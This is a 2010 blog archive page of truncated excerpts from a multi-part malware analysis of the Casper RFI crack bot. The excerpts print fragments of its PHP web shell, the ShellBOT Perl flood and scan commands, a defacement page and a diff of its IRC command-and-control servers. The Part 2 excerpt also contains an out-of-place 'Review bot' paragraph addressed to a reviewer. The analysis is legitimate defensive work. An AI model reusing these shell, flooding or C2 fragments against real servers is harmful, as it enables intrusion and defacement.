Irregular Expressions:

August 2010


August 27, 2010  1:14 PM

Casper RFI crack bot – Part 9

Dan O'Connor

So it looks like sh.txt is all about shell access, wow what a surprise! The next item is def.txt; there is not a whole lot in there besides the defacement message, so we are going to move on. The next item is a tar.gz, psy.tar.gz. Let's unpack it and look around. It's from a project...

August 27, 2010  11:59 AM

Casper RFI crack bot – Part 8

Dan O'Connor

We have one more to decode, $shell_data

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target =...


August 27, 2010  8:48 AM

Casper RFI crack bot – Part 7

Dan O'Connor

At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was...


August 27, 2010  8:33 AM

Casper RFI crack bot – Part 6

Dan O'Connor

We can do something fun with this,

$defacer     = "def.txt";
less def.txt
<title>-- Hacked bY XXXXXXXX --</title>
Off to Google we go. This won't give an exact number, but we are going to be able to get a count of the number of web servers this guy...


August 22, 2010  9:44 PM

Casper RFI crack bot – Part 5

Dan O'Connor

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de; both sites are no longer up and have not been for a while. There are also a few things worth looking into here: the script mentions fx29shell.php, which is a php shell that can be loaded onto the system. I can...


August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4

Dan O'Connor

sh.txt This one also looks juicy! Another php, <?php $sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20="; $sh_ver = "0.0 01.01.2010"; $sh_name = base64_decode($sh_id).$sh_ver; $sh_mainurl = "http://xxxxxx.ru/config/"; $html_start =...


August 21, 2010  12:12 AM

Casper RFI crack bot – Part 3

Dan O'Connor

iso.txt is looking promising for a peek.

#!/usr/bin/perl
#
#  ShellBOT by: XXXXXXXXXXXX
#       Greetz: XXXXXXXXXXXXXX
#
# Comandos:
#           @oldpack <ip> <bytes> <tempo>;
#           @udp <ip> <porta> <tempo>;
#           @fullportscan...


August 21, 2010  12:04 AM

Casper RFI crack bot – Part 2

Dan O'Connor

There is more than one file in each rar that appears to be a copy of the bot. The differences are pretty minor.

scan.txt
-my @servers = ("irc.xxxx.org");
+my @servers = ("irc.xxxxxx.org","irc.xxxxxx.org");
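Review bot: the only substantive change in this region is the `@servers` list growing from one IRC host to two (the hostnames are redacted on the page), so a detection rule or blocklist keyed on the single C2 hostname from the first variant would miss the second; match on both hostnames, or better, on the bot's IRC connection behaviour rather than a fixed server name.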

@@ -3,7 +3,7 @@
 ################################
 #  CASPER RFI CRACK Bot v1.1 ...


August 20, 2010  10:31 PM

Casper RFI crack bot – Part 1

Dan O'Connor

If you saw the ISC today (isc.sans.edu) there is a posting about a perl Unix bot making the rounds. http://isc.sans.edu/diary.html?storyid=9430 There are signatures around from Emerging Threats to detect the bot, if you need them. http://doc.emergingthreats.net/2011176 I have found a server...


August 16, 2010  5:21 PM

Good blog on iPhone / iPad hacking

Dan O'Connor

http://blog.iphone-dev.org/ I wish I could link to the first article. It talks about a patch out for non-early iPhone and iPod touch users that leaves them with security holes, that they fixed and can be applied through Cydia! I really appreciate people that take their time to give back...

